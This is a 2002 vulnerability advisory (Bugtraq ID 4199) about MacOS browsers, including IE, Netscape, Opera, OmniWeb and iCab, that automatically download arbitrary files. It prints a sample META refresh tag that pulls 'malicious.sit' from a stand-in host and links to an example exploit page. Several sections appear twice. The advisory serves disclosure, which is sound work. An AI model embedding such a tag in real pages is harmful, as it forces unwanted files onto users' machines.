Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
BID:4199
Info
Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
| Bugtraq ID: | 4199 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 27 2002 12:00AM |
| Updated: | Feb 27 2002 12:00AM |
| Credit: | Discovered by vm_converter <[email protected]>. |
| Vulnerable: |
Opera Software Opera Web Browser 5.0 Mac Omni Group OmniWeb 4.1 beta11 Omni Group OmniWeb 4.0.6 Netscape Netscape 4.78 Mac Netscape Netscape 4.77 Mac Microsoft Internet Explorer Macintosh Edition 5.0 Microsoft Internet Explorer Macintosh Edition 4.5 MRJ 2.2 Microsoft Internet Explorer Macintosh Edition 4.5 MRJ 2.1.4 Microsoft Internet Explorer Macintosh Edition 4.5 iCab Company iCab Pre 2.71 iCab Company iCab Pre 2.7 |
| Not Vulnerable: | |
Discussion
Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
Various browsers for MacOS and MacOS X in Classic Mode allow malicious web pages to automatically download arbitrary files to the vulnerable user's computer.
This can be accomplished through the use of a META refresh tag similar to the following:
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit">
The ability to place arbitrary files in a known location such as the default download directory may aid in the exploitation of BID 3935, "Apple MacOS Internet Explorer File Execution Vulnerability".
Various browsers for MacOS and MacOS X in Classic Mode allow malicious web pages to automatically download arbitrary files to the vulnerable user's computer.
This can be accomplished through the use of a META refresh tag similar to the following:
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit">
The ability to place arbitrary files in a known location such as the default download directory may aid in the exploitation of BID 3935, "Apple MacOS Internet Explorer File Execution Vulnerability".
Exploit / POC
Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
The following example exploit page has been provided by vm_converter <[email protected]>:
http://www.u-struct.com/diary/img/20020131_OSissue_E/
The following example exploit page has been provided by vm_converter <[email protected]>:
http://www.u-struct.com/diary/img/20020131_OSissue_E/
Solution / Fix
Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
References:
References: